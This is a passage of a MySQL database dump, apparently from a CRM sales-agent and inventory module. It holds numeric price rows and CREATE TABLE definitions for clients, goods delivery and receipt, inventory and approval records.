(79, 0, 1819, 2, 16900000.00, '', NULL, '', ''),
(80, 0, 1820, 2, 16900000.00, '', NULL, '', ''),
(81, 0, 1821, 2, 0.00, '', NULL, '', ''),
(82, 0, 1822, 2, 0.00, '', NULL, '', ''),
(83, 0, 1823, 2, 0.00, '', NULL, '', ''),
(84, 0, 1824, 2, 0.00, '', NULL, '', ''),
(85, 0, 1825, 2, 0.00, '', NULL, '', ''),
(86, 0, 1826, 2, 0.00, '', NULL, '', ''),
(87, 0, 1827, 2, 0.00, '', NULL, '', ''),
(88, 0, 1828, 2, 0.00, '', NULL, '', ''),
(89, 0, 1829, 2, 0.00, '', NULL, '', ''),
(90, 0, 1830, 2, 0.00, '', NULL, '', ''),
(91, 0, 1831, 2, 0.00, '', NULL, '', ''),
(92, 0, 1832, 2, 0.00, '', NULL, '', ''),
(93, 0, 1833, 2, 0.00, '', NULL, '', ''),
(94, 0, 1834, 2, 0.00, '', NULL, '', ''),
(95, 0, 1835, 2, 0.00, '', NULL, '', ''),
(96, 0, 1836, 2, 0.00, '', NULL, '', ''),
(97, 0, 1837, 2, 65000000.00, '', NULL, '', ''),
(98, 0, 1838, 2, 0.00, '', NULL, '', ''),
(99, 0, 1839, 2, 0.00, '', NULL, '', ''),
(100, 0, 1840, 2, 0.00, '', NULL, '', ''),
(101, 0, 1841, 2, 0.00, '', NULL, '', ''),
(102, 0, 1842, 2, 36000000.00, '', NULL, '', ''),
(103, 0, 1843, 2, 0.00, '', NULL, '', ''),
(104, 0, 1844, 2, 0.00, '', NULL, '', ''),
(105, 0, 1845, 2, 0.00, '', NULL, '', ''),
(106, 0, 1846, 2, 0.00, '', NULL, '', ''),
(107, 0, 1847, 2, 0.00, '', NULL, '', ''),
(108, 0, 1848, 2, 0.00, '', NULL, '', ''),
(109, 0, 1849, 2, 0.00, '', NULL, '', ''),
(110, 0, 1850, 2, 0.00, '', NULL, '', ''),
(111, 0, 1851, 2, 0.00, '', NULL, '', ''),
(112, 0, 1852, 2, 0.00, '', NULL, '', ''),
(113, 0, 1853, 2, 0.00, '', NULL, '', ''),
(114, 0, 1854, 2, 0.00, '', NULL, '', ''),
(115, 0, 1855, 2, 0.00, '', NULL, '', ''),
(116, 0, 1856, 2, 0.00, '', NULL, '', ''),
(117, 0, 1857, 2, 0.00, '', NULL, '', ''),
(118, 0, 1858, 2, 0.00, '', NULL, '', ''),
(119, 0, 1859, 2, 6800000.00, '', NULL, '', ''),
(120, 0, 1860, 2, 0.00, '', NULL, '', ''),
(121, 0, 1861, 2, 0.00, '', NULL, '', ''),
(122, 0, 1862, 2, 0.00, '', NULL, '', ''),
(123, 0, 1863, 2, 0.00, '', NULL, '', ''),
(124, 0, 1864, 2, 0.00, '', NULL, '', ''),
(125, 0, 1865, 2, 0.00, '', NULL, '', ''),
(126, 0, 1866, 2, 6500000.00, '', NULL, '', ''),
(127, 0, 1867, 2, 0.00, '', NULL, '', ''),
(128, 0, 1868, 2, 0.00, '', NULL, '', ''),
(129, 0, 1869, 2, 0.00, '', NULL, '', ''),
(130, 0, 1870, 2, 0.00, '', NULL, '', ''),
(131, 0, 1871, 2, 0.00, '', NULL, '', ''),
(132, 0, 1872, 2, 0.00, '', NULL, '', ''),
(133, 0, 1873, 2, 0.00, '', NULL, '', ''),
(134, 0, 1874, 2, 0.00, '', NULL, '', ''),
(135, 0, 1875, 2, 0.00, '', NULL, '', ''),
(136, 0, 1876, 2, 0.00, '', NULL, '', ''),
(137, 0, 1877, 2, 0.00, '', NULL, '', ''),
(138, 0, 1878, 2, 0.00, '', NULL, '', ''),
(139, 0, 1879, 2, 0.00, '', NULL, '', ''),
(140, 0, 1880, 2, 0.00, '', NULL, '', ''),
(141, 0, 1881, 2, 0.00, '', NULL, '', ''),
(142, 0, 1882, 2, 0.00, '', NULL, '', ''),
(143, 0, 1883, 2, 6500000.00, '', NULL, '', ''),
(144, 0, 1884, 2, 0.00, '', NULL, '', ''),
(145, 0, 1885, 2, 0.00, '', NULL, '', ''),
(146, 0, 1886, 2, 0.00, '', NULL, '', ''),
(147, 0, 1887, 2, 0.00, '', NULL, '', ''),
(148, 0, 1888, 2, 0.00, '', NULL, '', ''),
(149, 0, 1889, 2, 0.00, '', NULL, '', ''),
(150, 0, 1890, 2, 0.00, '', NULL, '', ''),
(151, 0, 1891, 2, 5800000.00, '', NULL, '', ''),
(152, 0, 1892, 2, 0.00, '', NULL, '', ''),
(153, 0, 1893, 2, 0.00, '', NULL, '', ''),
(154, 0, 1894, 2, 0.00, '', NULL, '', ''),
(155, 0, 1895, 2, 0.00, '', NULL, '', ''),
(156, 0, 1896, 2, 0.00, '', NULL, '', ''),
(157, 0, 1897, 2, 0.00, '', NULL, '', ''),
(158, 0, 1898, 2, 0.00, '', NULL, '', ''),
(159, 0, 1899, 2, 0.00, '', NULL, '', ''),
(160, 0, 1900, 2, 0.00, '', NULL, '', ''),
(161, 0, 1901, 2, 0.00, '', NULL, '', ''),
(162, 0, 1902, 2, 0.00, '', NULL, '', ''),
(163, 0, 1903, 2, 0.00, '', NULL, '', ''),
(164, 0, 1904, 2, 0.00, '', NULL, '', ''),
(165, 0, 1905, 2, 0.00, '', NULL, '', ''),
(166, 0, 1906, 2, 0.00, '', NULL, '', ''),
(167, 0, 1907, 2, 0.00, '', NULL, '', ''),
(168, 0, 1908, 2, 0.00, '', NULL, '', ''),
(169, 0, 1909, 2, 0.00, '', NULL, '', ''),
(170, 0, 1910, 2, 0.00, '', NULL, '', ''),
(171, 0, 1911, 2, 0.00, '', NULL, '', ''),
(172, 0, 1912, 2, 0.00, '', NULL, '', ''),
(173, 0, 1913, 2, 0.00, '', NULL, '', ''),
(174, 0, 1914, 2, 0.00, '', NULL, '', ''),
(175, 0, 1915, 2, 0.00, '', NULL, '', ''),
(176, 0, 1916, 2, 0.00, '', NULL, '', ''),
(177, 0, 1917, 2, 19000000.00, '', NULL, '', ''),
(178, 0, 1918, 2, 0.00, '', NULL, '', ''),
(179, 0, 1919, 2, 0.00, '', NULL, '', ''),
(180, 0, 1920, 2, 0.00, '', NULL, '', ''),
(181, 0, 1921, 2, 180000000.00, '', NULL, '', ''),
(182, 0, 1922, 2, 0.00, '', NULL, '', ''),
(183, 0, 1923, 2, 0.00, '', NULL, '', ''),
(184, 0, 1924, 2, 500000.00, '', NULL, '', ''),
(185, 0, 1925, 2, 350000.00, '', NULL, '', ''),
(186, 0, 1926, 2, 19800000.00, '', NULL, '', ''),
(187, 0, 1927, 2, 5800000.00, '', NULL, '', ''),
(188, 0, 1928, 2, 500000.00, '', NULL, '', ''),
(189, 0, 1930, 2, 19000000.00, '', NULL, '', ''),
(190, 0, 1931, 2, 18500000.00, '', NULL, '', ''),
(191, 0, 1932, 2, 350000.00, '', NULL, '', ''),
(192, 0, 1935, 2, 0.00, '', NULL, '', ''),
(193, 0, 1936, 2, 0.00, '', NULL, '', ''),
(194, 0, 1937, 2, 3000000.00, '', NULL, '', ''),
(195, 0, 1938, 2, 550000.00, '', NULL, '', ''),
(196, 0, 1939, 2, 3200000.00, '', NULL, '', ''),
(197, 0, 1940, 2, 8600000.00, '', NULL, '', ''),
(198, 0, 1941, 2, 50000.00, '', NULL, '', ''),
(199, 0, 1741, 1, 45000000.00, '', NULL, '', ''),
(200, 0, 1742, 1, 0.00, '', NULL, '', ''),
(201, 0, 1743, 1, 0.00, '', NULL, '', ''),
(202, 0, 1744, 1, 0.00, '', NULL, '', ''),
(203, 0, 1745, 1, 0.00, '', NULL, '', ''),
(204, 0, 1746, 1, 0.00, '', NULL, '', ''),
(205, 0, 1747, 1, 0.00, '', NULL, '', ''),
(206, 0, 1748, 1, 0.00, '', NULL, '', ''),
(207, 0, 1749, 1, 0.00, '', NULL, '', ''),
(208, 0, 1750, 1, 0.00, '', NULL, '', ''),
(209, 0, 1751, 1, 0.00, '', NULL, '', ''),
(210, 0, 1752, 1, 0.00, '', NULL, '', ''),
(211, 0, 1753, 1, 0.00, '', NULL, '', ''),
(212, 0, 1754, 1, 0.00, '', NULL, '', ''),
(213, 0, 1755, 1, 0.00, '', NULL, '', ''),
(214, 0, 1756, 1, 0.00, '', NULL, '', ''),
(215, 0, 1757, 1, 0.00, '', NULL, '', ''),
(216, 0, 1758, 1, 0.00, '', NULL, '', ''),
(217, 0, 1759, 1, 0.00, '', NULL, '', ''),
(218, 0, 1760, 1, 0.00, '', NULL, '', ''),
(219, 0, 1761, 1, 0.00, '', NULL, '', ''),
(220, 0, 1762, 1, 0.00, '', NULL, '', ''),
(221, 0, 1763, 1, 0.00, '', NULL, '', ''),
(222, 0, 1764, 1, 0.00, '', NULL, '', ''),
(223, 0, 1765, 1, 0.00, '', NULL, '', ''),
(224, 0, 1766, 1, 0.00, '', NULL, '', ''),
(225, 0, 1767, 1, 0.00, '', NULL, '', ''),
(226, 0, 1768, 1, 0.00, '', NULL, '', ''),
(227, 0, 1769, 1, 0.00, '', NULL, '', ''),
(228, 0, 1770, 1, 0.00, '', NULL, '', ''),
(229, 0, 1771, 1, 0.00, '', NULL, '', ''),
(230, 0, 1772, 1, 0.00, '', NULL, '', ''),
(231, 0, 1773, 1, 0.00, '', NULL, '', ''),
(232, 0, 1774, 1, 0.00, '', NULL, '', ''),
(233, 0, 1775, 1, 0.00, '', NULL, '', ''),
(234, 0, 1776, 1, 0.00, '', NULL, '', ''),
(235, 0, 1777, 1, 0.00, '', NULL, '', ''),
(236, 0, 1778, 1, 0.00, '', NULL, '', ''),
(237, 0, 1779, 1, 0.00, '', NULL, '', ''),
(238, 0, 1780, 1, 0.00, '', NULL, '', ''),
(239, 0, 1781, 1, 0.00, '', NULL, '', ''),
(240, 0, 1782, 1, 0.00, '', NULL, '', ''),
(241, 0, 1783, 1, 0.00, '', NULL, '', ''),
(242, 0, 1784, 1, 0.00, '', NULL, '', ''),
(243, 0, 1785, 1, 0.00, '', NULL, '', ''),
(244, 0, 1786, 1, 0.00, '', NULL, '', ''),
(245, 0, 1787, 1, 0.00, '', NULL, '', ''),
(246, 0, 1788, 1, 0.00, '', NULL, '', ''),
(247, 0, 1789, 1, 0.00, '', NULL, '', ''),
(248, 0, 1790, 1, 0.00, '', NULL, '', ''),
(249, 0, 1791, 1, 3300000.00, '', NULL, '', ''),
(250, 0, 1792, 1, 0.00, '', NULL, '', ''),
(251, 0, 1793, 1, 0.00, '', NULL, '', ''),
(252, 0, 1794, 1, 0.00, '', NULL, '', ''),
(253, 0, 1795, 1, 0.00, '', NULL, '', ''),
(254, 0, 1796, 1, 0.00, '', NULL, '', ''),
(255, 0, 1797, 1, 0.00, '', NULL, '', ''),
(256, 0, 1798, 1, 0.00, '', NULL, '', ''),
(257, 0, 1799, 1, 0.00, '', NULL, '', ''),
(258, 0, 1800, 1, 0.00, '', NULL, '', ''),
(259, 0, 1801, 1, 0.00, '', NULL, '', ''),
(260, 0, 1802, 1, 0.00, '', NULL, '', ''),
(261, 0, 1803, 1, 0.00, '', NULL, '', ''),
(262, 0, 1804, 1, 0.00, '', NULL, '', ''),
(263, 0, 1805, 1, 0.00, '', NULL, '', ''),
(264, 0, 1806, 1, 0.00, '', NULL, '', ''),
(265, 0, 1807, 1, 0.00, '', NULL, '', ''),
(266, 0, 1808, 1, 0.00, '', NULL, '', ''),
(267, 0, 1809, 1, 0.00, '', NULL, '', ''),
(268, 0, 1810, 1, 0.00, '', NULL, '', ''),
(269, 0, 1811, 1, 0.00, '', NULL, '', ''),
(270, 0, 1812, 1, 0.00, '', NULL, '', ''),
(271, 0, 1813, 1, 0.00, '', NULL, '', ''),
(272, 0, 1814, 1, 168000000.00, '', NULL, '', ''),
(273, 0, 1815, 1, 165000000.00, '', NULL, '', ''),
(274, 0, 1816, 1, 165000000.00, '', NULL, '', ''),
(275, 0, 1817, 1, 163000000.00, '', NULL, '', ''),
(276, 0, 1818, 1, 16900000.00, '', NULL, '', ''),
(277, 0, 1819, 1, 16900000.00, '', NULL, '', ''),
(278, 0, 1820, 1, 16900000.00, '', NULL, '', ''),
(279, 0, 1821, 1, 0.00, '', NULL, '', ''),
(280, 0, 1822, 1, 0.00, '', NULL, '', ''),
(281, 0, 1823, 1, 0.00, '', NULL, '', ''),
(282, 0, 1824, 1, 0.00, '', NULL, '', ''),
(283, 0, 1825, 1, 0.00, '', NULL, '', ''),
(284, 0, 1826, 1, 0.00, '', NULL, '', ''),
(285, 0, 1827, 1, 0.00, '', NULL, '', ''),
(286, 0, 1828, 1, 0.00, '', NULL, '', ''),
(287, 0, 1829, 1, 0.00, '', NULL, '', ''),
(288, 0, 1830, 1, 0.00, '', NULL, '', ''),
(289, 0, 1831, 1, 0.00, '', NULL, '', ''),
(290, 0, 1832, 1, 0.00, '', NULL, '', ''),
(291, 0, 1833, 1, 0.00, '', NULL, '', ''),
(292, 0, 1834, 1, 0.00, '', NULL, '', ''),
(293, 0, 1835, 1, 0.00, '', NULL, '', ''),
(294, 0, 1836, 1, 0.00, '', NULL, '', ''),
(295, 0, 1837, 1, 65000000.00, '', NULL, '', ''),
(296, 0, 1838, 1, 0.00, '', NULL, '', ''),
(297, 0, 1839, 1, 0.00, '', NULL, '', ''),
(298, 0, 1840, 1, 0.00, '', NULL, '', ''),
(299, 0, 1841, 1, 0.00, '', NULL, '', ''),
(300, 0, 1842, 1, 36000000.00, '', NULL, '', ''),
(301, 0, 1843, 1, 0.00, '', NULL, '', ''),
(302, 0, 1844, 1, 0.00, '', NULL, '', ''),
(303, 0, 1845, 1, 0.00, '', NULL, '', ''),
(304, 0, 1846, 1, 0.00, '', NULL, '', ''),
(305, 0, 1847, 1, 0.00, '', NULL, '', ''),
(306, 0, 1848, 1, 0.00, '', NULL, '', ''),
(307, 0, 1849, 1, 0.00, '', NULL, '', ''),
(308, 0, 1850, 1, 0.00, '', NULL, '', ''),
(309, 0, 1851, 1, 0.00, '', NULL, '', ''),
(310, 0, 1852, 1, 0.00, '', NULL, '', ''),
(311, 0, 1853, 1, 0.00, '', NULL, '', ''),
(312, 0, 1854, 1, 0.00, '', NULL, '', ''),
(313, 0, 1855, 1, 0.00, '', NULL, '', ''),
(314, 0, 1856, 1, 0.00, '', NULL, '', ''),
(315, 0, 1857, 1, 0.00, '', NULL, '', ''),
(316, 0, 1858, 1, 0.00, '', NULL, '', ''),
(317, 0, 1859, 1, 6800000.00, '', NULL, '', ''),
(318, 0, 1860, 1, 0.00, '', NULL, '', ''),
(319, 0, 1861, 1, 0.00, '', NULL, '', ''),
(320, 0, 1862, 1, 0.00, '', NULL, '', ''),
(321, 0, 1863, 1, 0.00, '', NULL, '', ''),
(322, 0, 1864, 1, 0.00, '', NULL, '', ''),
(323, 0, 1865, 1, 0.00, '', NULL, '', ''),
(324, 0, 1866, 1, 6500000.00, '', NULL, '', ''),
(325, 0, 1867, 1, 0.00, '', NULL, '', ''),
(326, 0, 1868, 1, 0.00, '', NULL, '', ''),
(327, 0, 1869, 1, 0.00, '', NULL, '', ''),
(328, 0, 1870, 1, 0.00, '', NULL, '', ''),
(329, 0, 1871, 1, 0.00, '', NULL, '', ''),
(330, 0, 1872, 1, 0.00, '', NULL, '', ''),
(331, 0, 1873, 1, 0.00, '', NULL, '', ''),
(332, 0, 1874, 1, 0.00, '', NULL, '', ''),
(333, 0, 1875, 1, 0.00, '', NULL, '', ''),
(334, 0, 1876, 1, 0.00, '', NULL, '', ''),
(335, 0, 1877, 1, 0.00, '', NULL, '', ''),
(336, 0, 1878, 1, 0.00, '', NULL, '', ''),
(337, 0, 1879, 1, 0.00, '', NULL, '', ''),
(338, 0, 1880, 1, 0.00, '', NULL, '', ''),
(339, 0, 1881, 1, 0.00, '', NULL, '', ''),
(340, 0, 1882, 1, 0.00, '', NULL, '', ''),
(341, 0, 1883, 1, 6500000.00, '', NULL, '', ''),
(342, 0, 1884, 1, 0.00, '', NULL, '', ''),
(343, 0, 1885, 1, 0.00, '', NULL, '', ''),
(344, 0, 1886, 1, 0.00, '', NULL, '', ''),
(345, 0, 1887, 1, 0.00, '', NULL, '', ''),
(346, 0, 1888, 1, 0.00, '', NULL, '', ''),
(347, 0, 1889, 1, 0.00, '', NULL, '', ''),
(348, 0, 1890, 1, 0.00, '', NULL, '', ''),
(349, 0, 1891, 1, 5800000.00, '', NULL, '', ''),
(350, 0, 1892, 1, 0.00, '', NULL, '', ''),
(351, 0, 1893, 1, 0.00, '', NULL, '', ''),
(352, 0, 1894, 1, 0.00, '', NULL, '', ''),
(353, 0, 1895, 1, 0.00, '', NULL, '', ''),
(354, 0, 1896, 1, 0.00, '', NULL, '', ''),
(355, 0, 1897, 1, 0.00, '', NULL, '', ''),
(356, 0, 1898, 1, 0.00, '', NULL, '', ''),
(357, 0, 1899, 1, 0.00, '', NULL, '', ''),
(358, 0, 1900, 1, 0.00, '', NULL, '', ''),
(359, 0, 1901, 1, 0.00, '', NULL, '', ''),
(360, 0, 1902, 1, 0.00, '', NULL, '', ''),
(361, 0, 1903, 1, 0.00, '', NULL, '', ''),
(362, 0, 1904, 1, 0.00, '', NULL, '', ''),
(363, 0, 1905, 1, 0.00, '', NULL, '', ''),
(364, 0, 1906, 1, 0.00, '', NULL, '', ''),
(365, 0, 1907, 1, 0.00, '', NULL, '', ''),
(366, 0, 1908, 1, 0.00, '', NULL, '', ''),
(367, 0, 1909, 1, 0.00, '', NULL, '', ''),
(368, 0, 1910, 1, 0.00, '', NULL, '', ''),
(369, 0, 1911, 1, 0.00, '', NULL, '', ''),
(370, 0, 1912, 1, 0.00, '', NULL, '', ''),
(371, 0, 1913, 1, 0.00, '', NULL, '', ''),
(372, 0, 1914, 1, 0.00, '', NULL, '', ''),
(373, 0, 1915, 1, 0.00, '', NULL, '', ''),
(374, 0, 1916, 1, 0.00, '', NULL, '', ''),
(375, 0, 1917, 1, 19000000.00, '', NULL, '', ''),
(376, 0, 1918, 1, 0.00, '', NULL, '', ''),
(377, 0, 1919, 1, 0.00, '', NULL, '', ''),
(378, 0, 1920, 1, 0.00, '', NULL, '', ''),
(379, 0, 1921, 1, 180000000.00, '', NULL, '', ''),
(380, 0, 1922, 1, 0.00, '', NULL, '', ''),
(381, 0, 1923, 1, 0.00, '', NULL, '', ''),
(382, 0, 1924, 1, 0.00, '', NULL, '', ''),
(383, 0, 1925, 1, 0.00, '', NULL, '', ''),
(384, 0, 1926, 1, 19800000.00, '', NULL, '', ''),
(385, 0, 1927, 1, 5800000.00, '', NULL, '', ''),
(386, 0, 1928, 1, 500000.00, '', NULL, '', ''),
(387, 0, 1930, 1, 19000000.00, '', NULL, '', ''),
(388, 0, 1931, 1, 18500000.00, '', NULL, '', ''),
(389, 0, 1932, 1, 350000.00, '', NULL, '', ''),
(390, 0, 1935, 1, 0.00, '', NULL, '', ''),
(391, 0, 1936, 1, 0.00, '', NULL, '', ''),
(392, 0, 1937, 1, 3000000.00, '', NULL, '', ''),
(393, 0, 1938, 1, 550000.00, '', NULL, '', ''),
(394, 0, 1939, 1, 3200000.00, '', NULL, '', ''),
(395, 0, 1940, 1, 8600000.00, '', NULL, '', ''),
(396, 0, 1941, 1, 50000.00, '', NULL, '', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_approval_details`
--

CREATE TABLE `tblsa_approval_details` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(45) NOT NULL,
  `staffid` varchar(45) DEFAULT NULL,
  `approve` varchar(45) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `approve_action` varchar(255) DEFAULT NULL,
  `reject_action` varchar(255) DEFAULT NULL,
  `approve_value` varchar(255) DEFAULT NULL,
  `reject_value` varchar(255) DEFAULT NULL,
  `staff_approve` int(11) DEFAULT NULL,
  `action` varchar(45) DEFAULT NULL,
  `sender` int(11) DEFAULT NULL,
  `date_send` datetime DEFAULT NULL,
  `agent_id` int(11) DEFAULT NULL,
  `type` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_approval_setting`
--

CREATE TABLE `tblsa_approval_setting` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `related` varchar(255) NOT NULL,
  `setting` longtext NOT NULL,
  `type` varchar(20) DEFAULT NULL,
  `agent_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_clients`
--

CREATE TABLE `tblsa_clients` (
  `id` int(11) NOT NULL,
  `agent_id` int(11) DEFAULT NULL,
  `name` varchar(255) NOT NULL,
  `email` varchar(191) DEFAULT NULL,
  `vat` varchar(50) DEFAULT NULL,
  `phonenumber` varchar(100) DEFAULT NULL,
  `country` int(11) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `zip` varchar(20) DEFAULT NULL,
  `state` varchar(50) DEFAULT NULL,
  `address` text DEFAULT NULL,
  `website` varchar(150) DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `created_by` int(11) DEFAULT NULL,
  `group` int(11) DEFAULT NULL,
  `street` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_client_groups`
--

CREATE TABLE `tblsa_client_groups` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `description` varchar(255) NOT NULL,
  `agent_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_goods_delivery`
--

CREATE TABLE `tblsa_goods_delivery` (
  `id` int(10) UNSIGNED NOT NULL,
  `agent_id` int(11) NOT NULL,
  `rel_type` int(11) DEFAULT NULL COMMENT 'type goods delivery',
  `rel_document` int(11) DEFAULT NULL COMMENT 'document id of goods delivery',
  `customer_code` text DEFAULT NULL,
  `customer_name` text DEFAULT NULL,
  `to_` text DEFAULT NULL,
  `address` text DEFAULT NULL,
  `description` text DEFAULT NULL COMMENT 'the reason delivery',
  `staff_id` int(11) DEFAULT NULL COMMENT 'salesman',
  `date_c` date DEFAULT NULL,
  `date_add` date DEFAULT NULL,
  `goods_delivery_code` text DEFAULT NULL COMMENT 'số chứng từ xuất kho',
  `warehouse_id` int(11) DEFAULT NULL,
  `total_money` text DEFAULT NULL,
  `approval` int(11) DEFAULT 0 COMMENT 'status approval ',
  `addedfrom` int(11) DEFAULT NULL,
  `total_discount` text DEFAULT NULL,
  `after_discount` text DEFAULT NULL,
  `invoice_id` text DEFAULT NULL,
  `type` text DEFAULT NULL,
  `invoice_no` text DEFAULT NULL,
  `pr_order_id` int(11) DEFAULT NULL,
  `type_of_delivery` varchar(100) DEFAULT 'total',
  `additional_discount` decimal(15,2) DEFAULT 0.00,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `delivery_status` varchar(100) DEFAULT 'ready_for_packing',
  `shipping_fee` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_goods_delivery_detail`
--

CREATE TABLE `tblsa_goods_delivery_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `goods_delivery_id` int(11) NOT NULL,
  `commodity_code` text DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `warehouse_id` text DEFAULT NULL,
  `unit_id` text DEFAULT NULL,
  `quantities` text DEFAULT NULL,
  `unit_price` text DEFAULT NULL,
  `total_money` text DEFAULT NULL,
  `note` text DEFAULT NULL,
  `discount` text DEFAULT NULL,
  `discount_money` text DEFAULT NULL,
  `available_quantity` text DEFAULT NULL,
  `tax_id` text DEFAULT NULL,
  `total_after_discount` text DEFAULT NULL,
  `expiry_date` text DEFAULT NULL,
  `lot_number` text DEFAULT NULL,
  `guarantee_period` text DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_goods_delivery_invoices_pr_orders`
--

CREATE TABLE `tblsa_goods_delivery_invoices_pr_orders` (
  `id` int(10) UNSIGNED NOT NULL,
  `rel_id` int(11) DEFAULT NULL COMMENT 'goods_delivery_id',
  `rel_type` int(11) DEFAULT NULL COMMENT 'invoice_id or purchase order id',
  `type` varchar(100) DEFAULT NULL COMMENT 'invoice,  purchase_orders'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_goods_receipt`
--

CREATE TABLE `tblsa_goods_receipt` (
  `id` int(10) UNSIGNED NOT NULL,
  `agent_id` int(11) DEFAULT NULL,
  `supplier_code` text DEFAULT NULL,
  `supplier_name` text DEFAULT NULL,
  `deliver_name` text DEFAULT NULL,
  `buyer_id` int(11) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `pr_order_id` int(11) DEFAULT NULL COMMENT 'code puchase request agree',
  `date_c` date DEFAULT NULL,
  `date_add` date DEFAULT NULL,
  `goods_receipt_code` text DEFAULT NULL,
  `warehouse_id` int(11) DEFAULT NULL,
  `total_tax_money` text DEFAULT NULL,
  `total_goods_money` text DEFAULT NULL,
  `value_of_inventory` text DEFAULT NULL,
  `total_money` text DEFAULT NULL COMMENT 'total_money = total_tax_money +total_goods_money ',
  `addedfrom` int(11) DEFAULT NULL,
  `approval` int(11) DEFAULT 0,
  `type` text DEFAULT NULL,
  `requester` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_goods_receipt_detail`
--

CREATE TABLE `tblsa_goods_receipt_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `goods_receipt_id` int(11) NOT NULL,
  `commodity_code` varchar(100) DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `warehouse_id` text DEFAULT NULL,
  `unit_id` text DEFAULT NULL,
  `quantities` text DEFAULT NULL,
  `unit_price` varchar(100) DEFAULT NULL,
  `tax` varchar(100) DEFAULT NULL,
  `tax_money` varchar(100) DEFAULT NULL,
  `goods_money` varchar(100) DEFAULT NULL,
  `date_manufacture` date DEFAULT NULL,
  `expiry_date` date DEFAULT NULL,
  `note` text DEFAULT NULL,
  `discount` text DEFAULT NULL,
  `discount_money` text DEFAULT NULL,
  `lot_number` text DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `tax_name` text DEFAULT NULL,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_goods_transaction_detail`
--

CREATE TABLE `tblsa_goods_transaction_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `agent_id` int(11) NOT NULL,
  `goods_receipt_id` int(11) DEFAULT NULL COMMENT 'id_goods_receipt_id or goods_delivery_id',
  `goods_id` int(11) NOT NULL COMMENT ' is id commodity',
  `old_quantity` varchar(100) DEFAULT NULL,
  `quantity` varchar(100) DEFAULT NULL,
  `date_add` datetime DEFAULT NULL,
  `commodity_id` int(11) NOT NULL,
  `warehouse_id` text NOT NULL,
  `note` text DEFAULT NULL,
  `status` int(11) DEFAULT NULL COMMENT '1:Goods receipt note 2:Goods delivery note',
  `purchase_price` varchar(100) DEFAULT NULL,
  `price` varchar(100) DEFAULT NULL,
  `expiry_date` text DEFAULT NULL,
  `lot_number` text DEFAULT NULL,
  `from_stock_name` int(11) DEFAULT NULL,
  `to_stock_name` int(11) DEFAULT NULL,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_inventory_manage`
--

CREATE TABLE `tblsa_inventory_manage` (
  `id` int(10) UNSIGNED NOT NULL,
  `warehouse_id` int(11) NOT NULL,
  `commodity_id` int(11) NOT NULL,
  `inventory_number` text DEFAULT NULL,
  `date_manufacture` date DEFAULT NULL,
  `expiry_date` date DEFAULT NULL,
  `agent_id` int(11) NOT NULL,
  `lot_number` text DEFAULT NULL,
  `purchase_price` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_join_program_request`
--

CREATE TABLE `tblsa_join_program_request` (
  `id` int(11) NOT NULL,
  `program_id` int(11) DEFAULT NULL,
  `agent_id` int(11) DEFAULT NULL,
  `status` varchar(20) DEFAULT NULL,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_options`
--

CREATE TABLE `tblsa_options` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `value` text NOT NULL,
  `agent_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsa_programs`
--

CREATE TABLE `tblsa_programs` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `from_date` date DEFAULT NULL,
  `to_date` date DEFAULT NULL,
  `indefinite` int(11) DEFAULT NULL,
